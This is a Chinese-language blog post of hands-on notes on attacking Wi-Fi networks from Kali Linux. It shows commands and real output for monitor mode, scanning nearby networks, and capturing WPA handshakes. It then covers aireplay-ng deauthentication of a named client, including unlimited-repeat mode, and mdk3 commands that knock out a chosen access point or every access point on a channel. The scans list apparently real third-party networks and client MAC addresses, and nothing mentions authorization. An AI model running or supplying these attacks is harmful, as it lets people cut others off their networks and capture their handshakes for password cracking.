无线网络攻击笔记

一、查看插入的网卡

iwconfig    --查看插入的网卡
┌──(root💀Kali)-[~] 
└─# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.442 GHz  Tx-Power=20 dBm   
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Power Management:off
lsusb           -- 查看所有外置USB设备
┌──(root💀Kali)-[~]
└─# lsusb
Bus 001 Device 003: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 003 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 004 Device 003: ID 203a:fffc PARALLELS Virtual Mouse
Bus 004 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
airmon-ng   -- 查看无线网卡
┌──(root💀Kali)-[~]
└─# airmon-ng            

PHY Interface   Driver      Chipset

phy1    wlan0mon    rt2800usb   Ralink Technology, Corp. RT5370

二、开启、关闭网卡监听模式

airmon-ng start wlan0     开启网卡监听模式,记录monitor名称,杀掉其他使用WiFi进程
┌──(root💀Kali)-[~]
└─# airmon-ng start wlan0  

Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

    PID Name
    447 NetworkManager
  13930 wpa_supplicant

PHY Interface   Driver      Chipset

phy1    wlan0       rt2800usb   Ralink Technology, Corp. RT5370
        (mac80211 monitor mode vif enabled for [phy1]wlan0 on [phy1]wlan0mon)
        (mac80211 station mode vif disabled for [phy1]wlan0)

================================================================================
airmon-ng stop wlan0mon     关闭网卡监听模式
┌──(root💀Kali)-[~]
└─# airmon-ng stop wlan0mon                                                                                                         130 ⨯

PHY Interface   Driver      Chipset

phy1    wlan0mon    rt2800usb   Ralink Technology, Corp. RT5370
        (mac80211 station mode vif enabled on [phy1]wlan0)
        (mac80211 monitor mode vif disabled for [phy1]wlan0mon)

三、扫描Wi-Fi信号(5Ghz需制定频率)

airodump-ng wlan0mon
结果字段介绍:
        BSSID:     是AP端的MAC地址
        PWR:       是信号强度,数字越小越好
        Beacons:   无线AP发出的通告编号,每个接入点(AP)在最低速率(1M)时差不多每秒会发送10个左右的beacon
        Data:      是对应的路由器的在线数据吞吐量,数字越大,数据上传量越大。
        s:         过去10秒钟内每秒捕获数据分组的数量
        CH:        是对应路由器的所在频道
        MB:        无线AP所支持的最大速率(Mbps)
        ENC:       使用的加密算法体系。OPN表示表示无加密。WEP?表示WEP或者WPA/WPA2,WEP(没有问号)表明静态或动态WEP。如果出现TKIP或CCMP,那么就是WPA/WPA2
        CIPHER:    检测到的加密算法,CCMP,WRAAP,TKIP,WEP,WEP104中的一种。一般来说(不一定),TKIP与WPA结合使用,CCMP与WPA2结合使用。如果密钥索引值大于0,显示为WEP40.标准情况下,索引0-3是40bit,104bit应该是0
        AUTH:      使用的认证协议。常用的有MGT(WPA/WPA2使用独立的认证服务器),SKA(WEP的共享密钥),PSK(WPA/WPA2的预共享密钥)或者OPN(WEP开放式)
        ESSID:     是对应路由器SSID的名称
第二部分字段介绍:
        BSSID:     是AP端的MAC地址
        STATION:   客户端的mac地址,包括连上的和想要搜索无线来连接的客户端。如果没有客户端连接上,就在BSSID下显示not associated
        PWR:       是信号强度,数字越小越好.
        Rate:      表示传输速率
        Lost:      表示在过去10秒钟内丢失的数据分组,基于序列号检测。
        Frames:    客户端发送的数据分组数量
        Notes:     备注
        Probe:     被客户端查探的ESSID。如果客户端正试图连接一个AP,但是没有连接上,则将会显示在这里。

┌──(root💀Kali)-[~]
└─# airodump-ng wlan0mon
 CH 12 ][ Elapsed: 0 s ][ 2021-09-01 22:19 

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 34:96:72:67:DA:13  -59        0        2    0   6   -1   WPA              <length:  0>                                                  
 54:92:09:2A:EB:E0  -41        1        0    0   6  300   WPA2 CCMP   PSK  7dingdong                                                     
 30:FC:68:90:AE:0B  -48        3        1    0   6  405   WPA2 CCMP   PSK  TP-LINK_AE0B                                                  
 F0:B4:29:D9:DD:99  -45        2        0    0  11  130   WPA2 CCMP   PSK  SanheSoft                                                     
 EC:23:7B:32:FA:38  -41        2        0    0  11  130   WPA2 CCMP   PSK  ChinaNet-CJGd                                                 
 F4:83:CD:FF:A2:59  -62        2        0    0  11  405   WPA2 CCMP   PSK  TP-LINK_A8367                                                 
 EC:F8:EB:E0:45:49  -68        2        0    0   9  130   WPA2 CCMP   PSK  ChinaNet-f3AU                                                 
 20:76:93:52:57:CE  -16        4        0    0  12  270   WPA2 CCMP   PSK  PDCN                                                          
 EC:6C:B5:8F:0C:85  -51        1        0    0   9  130   WPA2 CCMP   PSK  CU_3HjA                                                       
 EC:23:7B:32:BD:58  -41        3        0    0   9  130   WPA2 CCMP   PSK  ChinaNet-vpyV                                                 
 8C:DC:02:33:66:31  -38        3        0    0   9  130   WPA2 CCMP   PSK  CU_fP7c                                                       
 EC:23:7B:32:E2:18  -53        3        0    0   9  130   WPA2 CCMP   PSK  ChinaNet-umti                                                 
 C0:9F:E1:74:C2:38  -53        2       35   16   3  130   WPA2 CCMP   PSK  8151                                                          
 EC:23:7B:32:C9:68  -45        3        0    0   2  130   WPA2 CCMP   PSK  ChinaNet-gDWT                                                 
 D0:76:E7:BB:78:60  -23        3        2    0   7  270   WPA2 CCMP   PSK  YUNYI_2.4G                                                    
 EC:23:7B:32:E2:C0  -47        2        0    0   1  130   WPA2 CCMP   PSK  ChinaNet-NVXM                                                 
 80:41:26:58:FE:D4  -35        2        0    0   1  130   WPA2 CCMP   PSK  CU_Aeg3                                                       

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 34:96:72:67:DA:13  BE:D1:05:12:0C:12   -1    1e- 0      0        2                                                                      
 54:92:09:2A:EB:E0  56:69:E8:06:E2:6C  -42    0 - 1      0       12                                                                      
 30:FC:68:90:AE:0B  B6:30:E3:4F:31:A1   -1    2e- 0      0        1                                                                      
 (not associated)   78:11:DC:AC:BF:32  -34    0 - 1      0        4         KSCQ_office_2.4                                              
 F0:B4:29:D9:DD:99  64:6C:80:74:BE:85  -64    0 -24      0        1                                                                      
 C0:9F:E1:74:C2:38  50:2B:73:A0:1E:91  -64    0 -24e     0        1                                                                      
 C0:9F:E1:74:C2:38  30:B4:9E:97:26:72  -54    0 - 6      0        4                                                                      
 C0:9F:E1:74:C2:38  02:C4:4B:63:02:52  -62    0 - 6      1        2                                                                      
 C0:9F:E1:74:C2:38  14:5F:94:88:34:E8   -1    6e- 0      0       34                                                                      

四、查看连接该AP的客户端

airodump-ng -c 6 -w Desktop/handshake --bssid C0:00:00:00:00:48 wlan0mon
airodump-ng -c <AP的频道、信道> -w <抓取握手包的存放位置> --bssid <AP的MAC地址> <无线网名称>


┌──(root💀Kali)-[~]
└─# airodump-ng -c 7 --bssid D0:76:E7:BB:78:60 wlan0mon        
 CH  7 ][ Elapsed: 12 s ][ 2021-09-01 22:30 

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 D0:76:E7:BB:78:60  -24 100      117       45    1   7  270   WPA2 CCMP   PSK  YUNYI_2.4G                                                

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 D0:76:E7:BB:78:60  9C:99:A0:5A:0F:37  -24    0 - 6      0        1                                                                      
 D0:76:E7:BB:78:60  64:90:C1:34:7D:56  -34    0 - 1e     0        3                                                                      
 D0:76:E7:BB:78:60  5C:EA:1D:0E:B7:01  -34    1e- 6e     0        5                                                                      
Quitting...

五、对指定客户端发起解除认证攻击(强制指定客户端掉线)

aireplay-ng -0 0 -a C0:00:00:00:00:48 -c 18:00:00:00:00:88 wlan0mon
aireplay-ng -<攻击模式> [攻击次数,0为无限攻击] -a <AP端的MAC地址> -c <客户端端的MAC地址> <无线网卡名称>
┌──(root💀Kali)-[~]
└─# aireplay-ng -0 10 -a D0:76:E7:BB:78:60 -c 9C:99:A0:5A:0F:37 wlan0mon                                                            130 ⨯
22:32:38  Waiting for beacon frame (BSSID: D0:76:E7:BB:78:60) on channel 7
22:32:38  Sending 64 directed DeAuth (code 7). STMAC: [9C:99:A0:5A:0F:37] [ 0|53 ACKs]
22:32:39  Sending 64 directed DeAuth (code 7). STMAC: [9C:99:A0:5A:0F:37] [ 0|58 ACKs]
22:32:40  Sending 64 directed DeAuth (code 7). STMAC: [9C:99:A0:5A:0F:37] [ 0|54 ACKs]
22:32:40  Sending 64 directed DeAuth (code 7). STMAC: [9C:99:A0:5A:0F:37] [ 8|56 ACKs]
22:32:41  Sending 64 directed DeAuth (code 7). STMAC: [9C:99:A0:5A:0F:37] [ 0|54 ACKs]
22:32:41  Sending 64 directed DeAuth (code 7). STMAC: [9C:99:A0:5A:0F:37] [12|56 ACKs]
22:32:42  Sending 64 directed DeAuth (code 7). STMAC: [9C:99:A0:5A:0F:37] [ 0|45 ACKs]
22:32:42  Sending 64 directed DeAuth (code 7). STMAC: [9C:99:A0:5A:0F:37] [ 7|50 ACKs]
22:32:43  Sending 64 directed DeAuth (code 7). STMAC: [9C:99:A0:5A:0F:37] [15|49 ACKs]
22:32:43  Sending 64 directed DeAuth (code 7). STMAC: [9C:99:A0:5A:0F:37] [ 0|49 ACKs]

六、对指定AP发起攻击(强制指定AP下所有客户端掉线)

打掉指定无线AP
mdk3 wlan0mon a -a D8:CE:3A:1F:5D:3D
让所有频道/信道为2的AP掉线
mdk3 wlan0mon d -c 2
排除SSID.txt里面的AP(MAC地址),其他全部打掉
mdk3 waln0mon d -c 2 -w "SSID.txt"
┌──(root💀Kali)-[~]
└─# mdk3 wlan0mon a -a D8:CE:3A:1F:5D:3D
AP D8:CE:3A:1F:5D:3D is responding!           
AP D8:CE:3A:1F:5D:3D seems to be INVULNERABLE!      
Device is still responding with   500 clients connected!
AP D8:CE:3A:1F:5D:3D seems to be INVULNERABLE!      
Device is still responding with  1000 clients connected!
AP D8:CE:3A:1F:5D:3D seems to be INVULNERABLE!      
Device is still responding with  1500 clients connected!
AP D8:CE:3A:1F:5D:3D seems to be INVULNERABLE!      
Device is still responding with  2000 clients connected!
AP D8:CE:3A:1F:5D:3D seems to be INVULNERABLE!      
Device is still responding with  2500 clients connected!
AP D8:CE:3A:1F:5D:3D seems to be INVULNERABLE!      
Device is still responding with  3000 clients connected!
AP D8:CE:3A:1F:5D:3D seems to be INVULNERABLE!      
Device is still responding with  3500 clients connected!
AP D8:CE:3A:1F:5D:3D seems to be INVULNERABLE!      
Device is still responding with  4000 clients connected!
赞(0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址